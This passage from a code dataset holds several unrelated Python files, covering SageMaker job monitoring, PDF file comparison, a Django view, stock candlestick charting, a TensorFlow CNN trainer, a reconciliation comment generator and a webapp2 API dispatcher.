self._on_complete_callback = None\n self._host_metrics_fetched_successfully = False\n self._cloudwatch_client = boto3.client('cloudwatch')\n\n def monitor(self):\n self._logger.info(\"Monitoring job ... {}\".format(self._job_name))\n while True:\n response = self._describe_job()\n if self._logger.isEnabledFor(logging.DEBUG):\n self._logger.debug(pprint.pformat(response, indent=4))\n\n status = self._job_status(response)\n running_time_sec = self._total_running_time_sec(response)\n billing_time_sec = self._billing_time_sec(response)\n Report.job_status(self._job_name, running_time_sec, billing_time_sec, status)\n\n self._report_online_metrics(response)\n\n if status == SMApiConstants.JOB_COMPLETED:\n self._report_final_metrics(response)\n self._logger.info(\"Job '{}' completed!\".format(self._job_name))\n if self._on_complete_callback:\n self._on_complete_callback(response)\n break\n elif status == SMApiConstants.JOB_FAILED:\n msg = \"Job '{}' failed! message: {}\" \\\n .format(self._job_name, response[SMApiConstants.FAILURE_REASON])\n self._logger.error(msg)\n raise MLCompException(msg)\n elif status != SMApiConstants.JOB_IN_PROGRESS:\n self._logger.warning(\"Unexpected job status! job-name: {}, status: {}\"\n .format(self._job_name, status))\n\n self._logger.info(\"Job '{}' is still running ... {} sec\"\n .format(self._job_name, running_time_sec))\n time.sleep(JobMonitorBase.MONITOR_INTERVAL_SEC)\n\n def set_on_complete_callback(self, on_complete_callback):\n # The prototype of the callback is 'callback(describe_response)'\n self._on_complete_callback = on_complete_callback\n return self\n\n def _total_running_time_sec(self, describe_response):\n create_time = self._job_create_time(describe_response)\n if create_time is None:\n return None\n\n return (self._last_running_ref_time(describe_response) - create_time).total_seconds()\n\n def _billing_time_sec(self, response):\n start_time = self._job_start_time(response)\n return (self._last_running_ref_time(response) - start_time).total_seconds() if start_time else None\n\n def _last_running_ref_time(self, describe_response):\n end_time = self._job_end_time(describe_response)\n return end_time if end_time else utcnow()\n\n def _job_create_time(self, describe_response):\n create_time = describe_response.get(SMApiConstants.CREATE_TIME)\n if create_time:\n if (utcnow() - create_time).total_seconds() > JobMonitorBase.MONITOR_INTERVAL_SEC * 2:\n self._logger.warning(\"The local machine clock and AWS CloudWatch clock are not synchronized!!!\")\n\n return create_time\n\n def _job_is_running(self, describe_response):\n return self._job_start_time(describe_response) is not None and \\\n self._job_end_time(describe_response) is None\n\n def _report_online_metrics(self, describe_response):\n self._report_job_host_metrics(describe_response, JobMonitorBase.ONLINE_METRICS_FETCHING_NUM_RETRIES)\n self._report_extended_online_metrics(describe_response)\n\n def _report_final_metrics(self, describe_response):\n if self._host_metrics_fetched_successfully:\n self._logger.info(\"Skip final job host metrics fetching\")\n else:\n self._logger.info(\"Trying to fetch final host metrics ... 
(#attempts: {})\"\n .format(JobMonitorBase.FINAL_METRICS_FETCHING_NUM_RETRIES))\n self._report_job_host_metrics(describe_response, JobMonitorBase.FINAL_METRICS_FETCHING_NUM_RETRIES)\n\n self._report_extended_final_metrics(describe_response)\n\n def _report_job_host_metrics(self, describe_response, num_retries):\n # No reason to start reading metrics before the job is actually starting\n if self._job_start_time(describe_response):\n job_instance_ids = self._get_job_instance_ids(num_retries)\n if job_instance_ids:\n self._logger.info(\"Job instance ids: {}\".format(job_instance_ids))\n metrics_data = self._fetch_job_host_metrics(job_instance_ids, describe_response)\n Report.job_host_metrics(self._job_name, metrics_data)\n self._host_metrics_fetched_successfully = True\n else:\n self._logger.info(\"Skip transform job host metrics reporting!\")\n\n def _get_job_instance_ids(self, num_retries):\n instance_ids = []\n for retry_index in range(num_retries):\n paginator = self._cloudwatch_client.get_paginator('list_metrics')\n response_iterator = paginator.paginate(Dimensions=[{'Name': SMApiConstants.HOST_KEY}],\n MetricName=SMApiConstants.METRIC_CPU_UTILIZATION,\n Namespace=self._metrics_namespace())\n for response in response_iterator:\n # if self._logger.isEnabledFor(logging.DEBUG):\n # self._logger.debug(pprint.pformat(response, indent=4))\n for metric in response[SMApiConstants.LIST_METRICS_NAME]:\n instance_id = metric[SMApiConstants.LIST_METRICS_DIM][0][SMApiConstants.LIST_METRICS_DIM_VALUE]\n if instance_id.startswith(self._job_name):\n instance_ids.append(instance_id)\n\n if instance_ids or retry_index == num_retries - 1:\n break\n\n time.sleep(JobMonitorBase.SLEEP_TIME_BETWEEN_METRICS_FETCHING_RETRIES_SEC)\n self._logger.debug(\"Another attempt to find job instance id! job name: {}, #attempt: {}\"\n .format(self._job_name, retry_index))\n\n if not instance_ids:\n self._logger.info(\"Couldn't find job instance id! 
job name: {}\".format(self._job_name))\n\n return instance_ids\n\n def _fetch_job_host_metrics(self, job_instance_ids, describe_response):\n start_time = self._job_start_time(describe_response)\n # Incrementing end time by 1 min since CloudWatch drops seconds before finding the logs.\n # This results in logs being searched in the time range in which the correct log line was not present.\n # Example - Log time - 2018-10-22 08:25:55\n # Here calculated end time would also be 2018-10-22 08:25:55 (without 1 min addition)\n # CW will consider end time as 2018-10-22 08:25 and will not be able to search the correct log.\n end_time = self._last_running_ref_time(describe_response) + timedelta(minutes=1)\n\n d, r = divmod((end_time - start_time).total_seconds(), 60)\n period = int(d) * 60 + 60 # must be a multiplier of 60\n self._logger.debug(\"Start time: {}, end time: {}, period: {} sec\".format(start_time, end_time, period))\n\n metric_data_queries = self._metric_data_queries(job_instance_ids, period)\n\n if self._logger.isEnabledFor(logging.DEBUG):\n self._logger.debug(pprint.pformat(metric_data_queries, indent=4))\n\n response = self._cloudwatch_client.get_metric_data(\n MetricDataQueries=metric_data_queries,\n StartTime=start_time,\n EndTime=end_time,\n ScanBy=SMApiConstants.TIMESTAMP_ASC\n )\n\n if self._logger.isEnabledFor(logging.DEBUG):\n self._logger.debug(pprint.pformat(response, indent=4))\n\n return response[SMApiConstants.METRICS_RESULTS]\n\n def _metric_data_queries(self, job_instance_ids, period):\n metric_data_queries = []\n for job_instance_id in job_instance_ids:\n inst_id = job_instance_id.split('-')[-1]\n for metric_meta in self._host_metrics_defs:\n query = {\n 'Id': metric_meta.id.format(inst_id),\n 'MetricStat': {\n 'Metric': {\n 'Namespace': self._metrics_namespace(),\n 'MetricName': metric_meta.metric_name,\n 'Dimensions': [\n {\n 'Name': SMApiConstants.HOST_KEY,\n 'Value': job_instance_id\n }\n ]\n },\n 'Period': period,\n 'Stat': metric_meta.stat\n }\n }\n metric_data_queries.append(query)\n\n return metric_data_queries\n\n @abc.abstractmethod\n def _describe_job(self):\n pass\n\n @abc.abstractmethod\n def _job_start_time(self, describe_response):\n pass\n\n @abc.abstractmethod\n def _job_end_time(self, describe_response):\n pass\n\n @abc.abstractmethod\n def _job_status(self, describe_response):\n pass\n\n @abc.abstractmethod\n def _report_extended_online_metrics(self, describe_response):\n pass\n\n @abc.abstractmethod\n def _report_extended_final_metrics(self, describe_response):\n pass\n\n @cached_property\n @abc.abstractmethod\n def _host_metrics_defs(self):\n pass\n\n @abc.abstractmethod\n def _metrics_namespace(self):\n pass\n","sub_path":"mlcomp/parallelm/extra/sagemaker/monitor/job_monitor_base.py","file_name":"job_monitor_base.py","file_ext":"py","file_size_in_byte":10499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"514857660","text":"import shutil\nimport numpy as np\nimport os\nimport os.path\nimport os.path\n\n\nbase_path=r\"D:\\\\pdfs\\\\\"\nsub_poath=\"new\"\npath=base_path+sub_poath\nprint(path)\n\n\npath_main=r\"D:\\\\sheet_upload\\\\\"\nprint(path_main)\n#print(os.listdir())\narr_pdf = [x for x in os.listdir(path) if x.endswith(\".pdf\")]\nprint(arr_pdf)\nprint(len(arr_pdf))\n\narr_pdf_main = [x for x in os.listdir(path_main) if 
x.endswith(\".pdf\")]\nprint(arr_pdf_main)\nprint(len(arr_pdf_main))\nlst_name_changed=[]\nmy_dict={}\nmy_dict2={}\n\nos.chdir(path_main)\nprint(os.getcwd())\nlst_diff=[]\nfor change in arr_pdf_main:\n #print(change)\n #print(change)\n tmp_name = change.replace(\"_datasheet_en.pdf\",\"\").replace(\"-\", \"\").replace(\":\", \"\").replace(\"_\", \"\")\n print(tmp_name)\n file_stats = os.stat(path_main+change)\n #print(file_stats)\n size = os.path.getsize(change)\n #lst_name_changed.append(change)\n #print(size)\n my_dict[tmp_name]= [size, change, path_main + \"\\\\\\\\\" + change]\n '''\n if change not in my_dict.keys():\n my_dict[change] = [size, tmp_name, path_main + \"\\\\\\\\\" + change]\n else:\n # print('uuuuuuuuuuuuuuuuuuuuu',my_dict[change][0])\n if (int(my_dict[change][0]) <= size):\n lst_diff.append(tmp_name)\n my_dict[change] = [size, tmp_name, path + \"\\\\\\\\\" + change]\n else:\n continue\n '''\nos.chdir(path)\nprint(os.getcwd())\nfor tt in arr_pdf:\n #print(tt)\n tmp_name2 = tt.replace(\"-\", \"\").replace(\":\", \"\").replace(\"_\", \"\").replace(\".pdf\",\"\")\n print(tmp_name2)\n #tmp_name=tmp_name+\".pdf\"\n #print()\n #file_stats = os.stat(path + tt)\n # print(file_stats)\n size2 = os.path.getsize(tt)\n my_dict2[tmp_name2] = [size2, tt, path + \"\\\\\\\\\" + tt]\nmy_dict3={}\nlst_ll=[]\nmap_file=open('D:\\\\sheet_final2\\\\map_files.csv', 'w', encoding='utf-8')\nmap_all_pid=open('D:\\\\sheet_final2\\\\map_all_pids.csv', 'w', encoding='utf-8')\nmap_all_pid.write(\"pid|new|old\"+\"\\n\")\nfor k , v in my_dict.items():\n if k in my_dict2.keys():\n inp_all = str(k) + \"|\" + my_dict2[k][1] + \"|\" + v[1] + \"\\n\"\n map_all_pid.write(inp_all)\n print(\"_____________________\",k)\n print(v)\n print(my_dict2[k])\n print(v[0])\n print(my_dict2[k][0])\n if(v[0]Welcome to Akirachix class students

    \")\ndef student(self,request):\n # students=Student.objects.all()\n students=Student.objects.get(id=1)\n \n context={\n 'test.message':'we will list our students here',\n 'student.name':'Susan Awiti',\n 'course':'python',\n 'description':'susan is bad student'\n # Student.objects.exclude(course='python')\n # return HttpResponse(students.description)\n # return HttpResponse(students)\n }\n return render(request,'listing_student.html',context)","sub_path":"firstapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"66123418","text":"# -*- coding: utf-8 -*-\nimport mplfinance as fplt\nimport yfinance as yf\n\ndef get_data(stock_id, period):\n stock_id = str(stock_id) + \".TW\" # Yahoo Finance 的 代號為台灣的代號 + .TW\n data = yf.Ticker(stock_id) # 抓取資料\n \n # 1mo = 1個月,max 可以把所有期間的資料都下載\n ohlc = data.history(period= period)\n ohlc = ohlc.loc[:, [\"Open\", \"High\", \"Low\", \"Close\", \"Volume\"]] # 選擇製圖需要欄位\n return ohlc\n \ndef draw_candle_chart(stock_id, ohlc):\n \n mc = fplt.make_marketcolors(\n up='tab:red',down='tab:green',\n wick={'up':'red','down':'green'},\n volume='tab:green',\n )\n \n s = fplt.make_mpf_style(marketcolors=mc)\n \n fplt.plot(\n ohlc,\n type = 'candle',\n style = s,\n title = stock_id,\n ylabel = 'Price ($)', \n volume = True,\n savefig='stock_Kbar.png',\n \n )\n\n #plt.savefig(\"\")\n \nif __name__ == \"__main__\":\n draw_candle_chart(2330)\n \n","sub_path":"程式交易實作/禮拜一的課/4. 合併/yF_Kbar.py","file_name":"yF_Kbar.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"483317950","text":"import numpy as np\nimport tensorflow as tf\nimport sys,os\nimport cPickle as pickle\nfrom net3 import graph, model, get_args, model_path\n\nwith open('/home/ouyangruo/Documents/BiShe/Picture/data0.pickle', 'rb') as m0, open('/home/ouyangruo/Documents/BiShe/Picture/data1.pickle', 'rb') as m1,\\\n open('/home/ouyangruo/Documents/BiShe/Picture/data2.pickle', 'rb') as m2, open('/home/ouyangruo/Documents/BiShe/Picture/data3.pickle', 'rb') as m3, \\\n open('/home/ouyangruo/Documents/BiShe/Picture/data4.pickle', 'rb') as m4, open('/home/ouyangruo/Documents/BiShe/Picture/data5.pickle', 'rb') as m5, \\\n open('/home/ouyangruo/Documents/BiShe/Picture/data6.pickle', 'rb') as m6, open('/home/ouyangruo/Documents/BiShe/Picture/data7.pickle', 'rb') as m7, \\\n open('/home/ouyangruo/Documents/BiShe/Picture/data8.pickle', 'rb') as m8, open('/home/ouyangruo/Documents/BiShe/Picture/data9.pickle', 'rb') as m9, \\\n open('/home/ouyangruo/Documents/BiShe/Picture_one/data0.pickle', 'rb') as f0, open('/home/ouyangruo/Documents/BiShe/Picture_one/data1.pickle', 'rb') as f1,\\\n open('/home/ouyangruo/Documents/BiShe/Picture_one/data2.pickle', 'rb') as f2, open('/home/ouyangruo/Documents/BiShe/Picture_one/data3.pickle', 'rb') as f3, \\\n open('/home/ouyangruo/Documents/BiShe/Picture_one/data4.pickle', 'rb') as f4, open('/home/ouyangruo/Documents/BiShe/Picture_one/data5.pickle', 'rb') as f5, \\\n open('/home/ouyangruo/Documents/BiShe/Picture_one/data6.pickle', 'rb') as f6, open('/home/ouyangruo/Documents/BiShe/Picture_one/data7.pickle', 'rb') as f7, \\\n open('/home/ouyangruo/Documents/BiShe/Picture_one/data8.pickle', 'rb') as f8, open('/home/ouyangruo/Documents/BiShe/Picture_one/data9.pickle', 'rb') as f9: \n \n train_datasets = np.concatenate((\n picklek.load(m0), picklek.load(m1), picklek.load(m2), 
pickle.load(m3), pickle.load(m4),\n pickle.load(m5), pickle.load(m6), pickle.load(m7), pickle.load(m8), pickle.load(m9)\n ))\n test_datasets = np.concatenate((\n pickle.load(f0), pickle.load(f1), pickle.load(f2), pickle.load(f3), pickle.load(f4),\n pickle.load(f5), pickle.load(f6), pickle.load(f7), pickle.load(f8), pickle.load(f9)\n ))\n print('Training set', train_datasets.shape)\n print('Test set', test_datasets.shape)\n\n\ntrain_size, test_size = 7000, 3000\nimage_size = 25\nnum_labels = 10\nnum_channels = 1 \n\ndef make_arrays(nb_rows, img_size):\n if nb_rows:\n labels = np.ndarray(nb_rows, dtype=np.int32)\n else:\n labels = None\n return labels\n\n\ndef merge_datasets(pickle_files, train_size):\n num_classes = len(pickle_files)\n train_labels = make_arrays(train_size, image_size)\n tsize_per_class = train_size // num_classes\n\n start_v, start_t = 0, 0\n end_t= tsize_per_class\n for label, pickle_file in enumerate(pickle_files):\n train_labels[start_t:end_t] = label\n start_t += tsize_per_class\n end_t += tsize_per_class\n\n return train_labels\n\n\ndef randomize(dataset, labels):\n permutation = np.random.permutation(labels.shape[0])\n shuffled_dataset = dataset[permutation, :, :]\n shuffled_labels = labels[permutation]\n return shuffled_dataset, shuffled_labels\n\n\n\ntrain_labels = merge_datasets(train_datasets, train_size)\ntest_labels = merge_datasets(test_datasets, test_size)\n\nprint('Training:', train_datasets.shape, train_labels.shape)\nprint('Testing:', test_datasets.shape, test_labels.shape)\n\ntrain_datasets, train_labels = randomize(train_datasets, train_labels)\ntest_datasets, test_labels = randomize(test_datasets, test_labels)\n\n# hold out part of the shuffled training data as a validation set (split size chosen arbitrarily)\nvalid_size = 1000\nvalid_datasets, valid_labels = train_datasets[:valid_size], train_labels[:valid_size]\ntrain_datasets, train_labels = train_datasets[valid_size:], train_labels[valid_size:]\n\n\ndef reformat(dataset, labels):\n dataset = dataset.reshape((-1, image_size, image_size, num_channels)).astype(np.float32)\n labels = (np.arange(num_labels) == labels[:,None]).astype(np.float32)\n return dataset, labels\ntrain_dataset, train_labels = reformat(train_datasets, train_labels)\nvalid_dataset, valid_labels = reformat(valid_datasets, valid_labels)\ntest_dataset, test_labels = reformat(test_datasets, test_labels)\nprint('Training set', train_dataset.shape, train_labels.shape)\nprint('Validation set', valid_dataset.shape, valid_labels.shape)\nprint('Test set', test_dataset.shape, test_labels.shape)\n\n\ndef accuracy(predictions, labels):\n #print (\"result1:\")\n #print np.argmax(predictions,1)\n return (100.0 * np.sum(np.argmax(predictions, 1) == np.argmax(labels, 1)) / predictions.shape[0])\n\nbatch_size = 128\n\ngraph = tf.Graph()\n\nwith graph.as_default():\n\n # Input data.\n tf_train_dataset = tf.placeholder(tf.float32, shape=(batch_size, image_size, image_size, num_channels))\n tf_train_labels = tf.placeholder(tf.float32, shape=(batch_size, num_labels))\n tf_valid_dataset = tf.constant(valid_dataset)\n tf_test_dataset = tf.constant(test_dataset)\n\n # Variables.\n layer0_weights = tf.Variable(tf.truncated_normal([5, 5, 1, 32], stddev=0.1))\n layer0_biases = tf.Variable(tf.zeros([32]))\n\n layer1_weights = tf.Variable(tf.truncated_normal([3, 3, 32, 64], stddev=0.1))\n layer1_biases = tf.Variable(tf.zeros([64]))\n\n layer2_weights = tf.Variable(tf.truncated_normal([3, 3, 64, 64], stddev=0.1))\n layer2_biases = tf.Variable(tf.constant(1.0, shape=[64]))\n\n layer3_weights = tf.Variable(tf.truncated_normal([3, 3, 64, 32], stddev=0.1))\n layer3_biases = tf.Variable(tf.constant(1.0, shape=[32]))\n\n layer4_weights = tf.Variable(tf.truncated_normal([4 * 4 * 32, 64], stddev=0.1))\n layer4_biases = tf.Variable(tf.constant(1.0, shape=[64]))\n\n 
layer5_weights = tf.Variable(tf.truncated_normal([64, 64], stddev=0.1))\n layer5_biases = tf.Variable(tf.constant(1.0, shape=[64]))\n\n layer6_weights = tf.Variable(tf.truncated_normal([64, 10], stddev=0.1))\n layer6_biases = tf.Variable(tf.constant(1.0, shape=[10]))\n\n\n #Model.\n #Now instead of using strides = 2 for convolutions we will use maxpooling with\n #same convolution sizes\n def model(data):\n conv = tf.nn.conv2d(data, layer0_weights, [1, 1, 1, 1], padding='SAME')\n maxpool = tf.nn.max_pool(conv, [1, 3, 3, 1], [1, 2, 2, 1], padding='SAME')\n hidden = tf.nn.relu(maxpool + layer0_biases)\n\n conv = tf.nn.conv2d(hidden, layer1_weights, [1, 1, 1, 1], padding='SAME')\n maxpool = tf.nn.max_pool(conv, [1, 3, 3, 1], [1, 2, 2, 1], padding='SAME')\n hidden = tf.nn.relu(maxpool + layer1_biases)\n\n conv = tf.nn.conv2d(hidden, layer2_weights, [1, 1, 1, 1], padding='SAME')\n hidden = tf.nn.relu(conv + layer2_biases)\n\n conv = tf.nn.conv2d(hidden, layer3_weights, [1, 1, 1, 1], padding='SAME')\n maxpool = tf.nn.max_pool(conv, [1, 3, 3, 1], [1, 2, 2, 1], padding='SAME')\n hidden = tf.nn.relu(maxpool + layer3_biases)\n\n shape = hidden.get_shape().as_list()\n reshape = tf.reshape(hidden, [shape[0], shape[1] * shape[2] * shape[3]])\n\n hidden = tf.nn.relu(tf.matmul(reshape, layer4_weights) + layer4_biases)\n\n hidden = tf.nn.relu(tf.matmul(hidden, layer5_weights) + layer5_biases)\n\n return tf.matmul(hidden, layer6_weights) + layer6_biases\n\n # Training computation.\n logits = model(tf_train_dataset)\n global_step = tf.Variable(0)\n start_learning_rate = 0.005\n decay_steps = 1000\n decay_size = 0.95\n learning_rate = tf.train.exponential_decay(start_learning_rate, global_step, decay_steps, decay_size)\n\n saver = tf.train.Saver()\n\n beta = 0.0005\n l2_loss = (beta*tf.nn.l2_loss(layer0_weights)\n + beta*tf.nn.l2_loss(layer0_biases)\n + beta*tf.nn.l2_loss(layer1_weights)\n + beta*tf.nn.l2_loss(layer1_biases)\n + beta*tf.nn.l2_loss(layer2_weights)\n + beta*tf.nn.l2_loss(layer2_biases)\n + beta*tf.nn.l2_loss(layer3_weights)\n + beta*tf.nn.l2_loss(layer3_biases)\n + beta*tf.nn.l2_loss(layer4_weights)\n + beta*tf.nn.l2_loss(layer4_biases)\n + beta*tf.nn.l2_loss(layer5_weights)\n + beta*tf.nn.l2_loss(layer5_biases)\n + beta*tf.nn.l2_loss(layer6_weights)\n + beta*tf.nn.l2_loss(layer6_biases))\n\n loss = tf.reduce_mean(\n tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=tf_train_labels) + l2_loss\n )\n # Optimizer.\n optimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss, global_step=global_step)\n # Predictions for the training, validation, and test data.\n train_prediction = tf.nn.softmax(logits)\n valid_prediction = tf.nn.softmax(model(tf_valid_dataset))\n test_prediction = tf.nn.softmax(model(tf_test_dataset))\n\n\nnum_steps = 10001\n\nwith tf.Session(graph=graph) as session:\n ckpt = tf.train.get_checkpoint_state('model')\n print(ckpt)\n try:\n assert (ckpt and ckpt.model_checkpoint_path)\n saver.restore(session, ckpt.model_checkpoint_path)\n except:\n tf.global_variables_initializer().run()\n print(\"--------- load error!!! 
--------\")\n\n \n for step in xrange(num_steps):\n offset = (step * batch_size) % (train_labels.shape[0] - batch_size)\n batch_data = train_dataset[offset:(offset + batch_size), :, :, :]\n batch_labels = train_labels[offset:(offset + batch_size), :]\n feed_dict = {tf_train_dataset : batch_data, tf_train_labels : batch_labels}\n session.run([optimizer], feed_dict=feed_dict)\n if (step % 100 == 0):\n l, predictions, l2 = session.run([loss, train_prediction, l2_loss], feed_dict=feed_dict)\n saver.save(session, '/ouyangruo/Documents/BiShe/model/model.ckpt')\n print(learning_rate.eval())\n print('Minibatch loss and l2 loss at step %d: %f, %f' % (step, l, l2))\n print('Minibatch accuracy: %.1f%%' % accuracy(predictions, batch_labels))\n print('Validation accuracy: %.1f%%' % accuracy(valid_prediction.eval(), valid_labels))\n print('Test accuracy: %.1f%%' % accuracy(test_prediction.eval(), test_labels))\n \n ","sub_path":"Code/train_cnn.py","file_name":"train_cnn.py","file_ext":"py","file_size_in_byte":9651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"122508477","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport pandas as pd\n\n\n# In[14]:\n\n\ndef brokermap(x):\n if x == 'barclays':\n return 'BARC'\n elif x == 'morgan stanely':\n return 'MS'\n elif x == 'jp morgan':\n return 'jpm'\n elif x == 'goldman sachs':\n return 'gs'\n elif x == 'us bank':\n return 'usbk'\n elif x == 'citi bank':\n return 'citi'\n elif x == 'northern trust':\n return 'NT'\n elif x == 'deutsche bank':\n return 'db'\n elif x=='state street':\n return 'sst'\n elif x == 'bn paribas':\n return 'bnp'\n elif x == 'credit suisse':\n return 'cs'\n else:\n return x\n \n\n\n# In[ ]:\n\n\ndef comgen(x,y,z,k,m,a,b,c):\n trade_ttype = ['buy','sell','sell short','cover short','spot fx','forward','forward fx','spotfx','forwardfx']\n pos_break = ['settlement amount , no pos break']\n x = x.lower()\n if m in trade_ttype:\n if x != 'geneva':\n if ((a!= 0) & (b!= 0)):\n com = k + ' ' +y + ' ' + str(z) + \" \" + 'for price'+' '+ str(a) + ' and quantity' +' ' + str(b) + ' ' + 'on trade date' + ' ' + str(c)+ '. Geneva yet to book' \n elif ((a==0) & (b!=0)):\n com = k + ' ' +y + ' ' + str(z) + \" \" + 'for quantity' +' ' + str(b) + ' ' + 'on trade date' + ' ' + str(c) + '. Geneva yet to book'\n elif ((a!=0) & (b==0)):\n com = k + ' ' +y + ' ' + str(z) + \" \" + 'for price' +' ' + str(a) + ' ' + 'on trade date' + ' ' + str(c) + '. Geneva yet to book'\n else:\n com = k + ' ' +y + ' ' + str(z) + ' ' + 'on trade date' + ' ' + str(c) + '. 
Geneva yet to book'\n else:\n if ((a!= 0) & (b!= 0)):\n com = 'Geneva' + ' ' +y + ' ' + str(z) + \" \" + 'for price'+' '+ str(a) + ' and quantity' +' ' + str(b) + ' ' + 'on trade date' + ' ' + str(c)+ '. ' + k + ' yet to book' \n elif ((a==0) & (b!=0)):\n com = 'Geneva' + ' ' +y + ' ' + str(z) + \" \" + 'for quantity' +' ' + str(b) + ' ' + 'on trade date' + ' ' + str(c) + '. ' + k + ' yet to book'\n elif ((a!=0) & (b==0)):\n com = 'Geneva' + ' ' +y + ' ' + str(z) + \" \" + 'for price' +' ' + str(a) + ' ' + 'on trade date' + ' ' + str(c) + '. ' + k + ' yet to book'\n else:\n com = 'Geneva' + ' ' +y + ' ' + str(z) + ' ' + 'on trade date' + ' ' + str(c) + '. ' + k + ' yet to book'\n \n elif m in pos_break:\n \n if ((a!= 0) & (b!= 0)):\n com ='No position break, Geneva to reflect jpm trade on ' + str(z) + \" \" + 'for price'+' '+ str(a) + ' and quantity' +' ' + str(b)\n elif ((a==0) & (b!=0)):\n com = 'No position break, Geneva to reflect jpm trade on ' + str(z) + \" \" + 'for quantity' +' ' + str(b) \n elif ((a!=0) & (b==0)):\n com = 'No position break, Geneva to reflect jpm trade on ' + str(z) + \" \" + 'for price' +' ' + str(a) \n else:\n com = 'No position break, Geneva to reflect jpm trade on ' + str(z)\n \n else:\n if x != 'geneva':\n \n com = k + ' ' +y + ' ' + str(z) + \". Geneva yet to book\"\n else:\n com = 'Geneva' + ' ' +y + ' ' + str(z)+ '. ' + k + ' booked the transaction'\n \n return com\n\n\nresult_non_trade['new_pb2'] = result_non_trade['new_pb2'].astype(str)\nresult_non_trade['predicted template'] = result_non_trade['predicted template'].astype(str)\nresult_non_trade['ViewData.Settle Date2'] = result_non_trade['ViewData.Settle Date'].dt.date\nresult_non_trade['ViewData.Settle Date2'] = result_non_trade['ViewData.Settle Date2'].astype(str)\nresult_non_trade['ViewData.Trade Date2'] = result_non_trade['ViewData.Trade Date'].dt.date\nresult_non_trade['ViewData.Trade Date2'] = result_non_trade['ViewData.Trade Date2'].astype(str)\nresult_non_trade['new_pb1'] = result_non_trade['new_pb1'].astype(str)\nresult_non_trade['new_pb1'] = result_non_trade['new_pb1'].apply(lambda x : brokermap(x))\n\n#result_non_trade['predicted comment'] = result_non_trade.apply(lambda x : comgen(x['new_pb2'],x['predicted template'],x['ViewData.Settle Date'],x['new_pb1']), axis = 1)\n#Change made on 24-12-2020 as per Abhijeet. The comgen function below was commented out and a new, more elaborate comgen function was coded in. 
Also, corresponding to the comgen function, predicted_comment apply function was also changed. \n#result_non_trade['predicted comment'] = result_non_trade.apply(lambda x : comgen(x['ViewData.Side0_UniqueIds'],x['predicted template'],x['ViewData.Settle Date'],x['new_pb1']), axis = 1)\nresult_non_trade['predicted comment'] = result_non_trade.apply(lambda x : comgen(x['new_pb2'],x['predicted template'],x['ViewData.Settle Date2'],x['new_pb1'],x['predicted category'],x['ViewData.Price'],x['ViewData.Quantity'],x['ViewData.Trade Date']), axis = 1)\n\nresult_non_trade = result_non_trade[['ViewData.Side0_UniqueIds','ViewData.Side1_UniqueIds','predicted category','predicted comment']]\n\n\n# In[2]:\n\n\ntemplate = pd.read_csv('weiss files for testing gompu/Weiss Comment template for delivery new.csv')\n\n\n# In[12]:\n\n\ntemplate.head(4)\n\n\n# In[7]:\n\n\ndef commentgen(x):\n com = 'booked the' + ' ' +str(x) +' '+'transaction on SD'\n return com\n\n\n# In[8]:\n\n\ntemplate['Template'] = template['Category'].apply(lambda x :commentgen(x))\n\n\n# In[10]:\n\n\ntemplate.drop('template', axis = 1, inplace = True)\n\n\n# In[11]:\n\n\ntemplate = template.rename(columns = {'Template':'template'})\n\n\n# In[13]:\n\n\ntemplate.to_csv('weiss files for testing gompu/Weiss Comment template for delivery new.csv')\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Abhijeet - Comment/Comgen final correction.py","file_name":"Comgen final correction.py","file_ext":"py","file_size_in_byte":5576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"446651562","text":"import hashlib\nimport logging\n\nfrom webapp2 import Response\nfrom webapp2 import cached_property\n\nfrom google.appengine.api import users\nfrom google.appengine.api import memcache\n\nfrom momentum.fatcatmap.handlers import WebHandler\nfrom momentum.fatcatmap.core.adapters.format.json import FCMJSONAdapter\n\n_api_services = {}\njsapi_cache = None\n\n\nclass FatcatmapAPIDispatcher(WebHandler):\n\tpass\n\t\nclass JavascriptAPIDispatcher(WebHandler):\n\t\n\t''' Returns a rendered JavaScript template to initialize the JSAPI environment with server-side values. 
'''\n\t\n\t@cached_property\n\tdef fcmServicesConfig(self):\n\t\treturn self.config.get('momentum.fatcatmap.services')\n\t\n\t@cached_property\n\tdef globalServicesConfig(self):\n\t\treturn self.config.get('momentum.services')\n\t\n\tdef get(self):\n\t\t\n\t\tglobal jsapi_cache\n\t\t\t\t\n\t\t## Generate list of services to expose to user\n\t\tsvcs = []\n\t\topts = {}\n\n\t\tif jsapi_cache is not None:\n\t\t\treturn jsapi_cache\n\t\telse:\n\t\t\tjsapi = memcache.get('jsapi-main')\n\t\t\tif jsapi is not None:\n\t\t\t\treturn jsapi\n\t\t\telse:\n\t\t\t\tfor name, config in self.fcmServicesConfig['services'].items():\n\t\t\t\t\tif config['enabled'] is True:\n\n\t\t\t\t\t\tsecurity_profile = self.globalServicesConfig['middleware_config']['security']['profiles'].get(config['config']['security'], None)\n\t\t\t\t\n\t\t\t\t\t\tcaching_profile = self.globalServicesConfig['middleware_config']['caching']['profiles'].get(config['config']['caching'], None)\n\n\t\t\t\t\t\tif security_profile is None:\n\n\t\t\t\t\t\t\t## Pull default profile if none is specified\n\t\t\t\t\t\t\tsecurity_profile = self.globalServicesConfig['middleware_config']['security']['profiles'][self.globalServicesConfig['defaults']['service']['config']['security']]\n\n\t\t\t\t\t\tif caching_profile is None:\n\t\t\t\t\t\t\tcaching_profile = self.globalServicesConfig['middleware_config']['caching']['profiles'][self.globalServicesConfig['defaults']['service']['config']['caching']]\n\n\t\t\t\t\t\t## Add caching to local opts\n\t\t\t\t\t\topts['caching'] = caching_profile['activate'].get('local', False)\n\n\t\t\t\t\t\t## Grab prefix\n\t\t\t\t\t\tservice_action = self.fcmServicesConfig['config']['url_prefix'].split('/')\n\n\t\t\t\t\t\t## Add service name\n\t\t\t\t\t\tservice_action.append(name)\n\t\t\t\t\n\t\t\t\t\t\t## Join into endpoint URL\n\t\t\t\t\t\tservice_action_url = 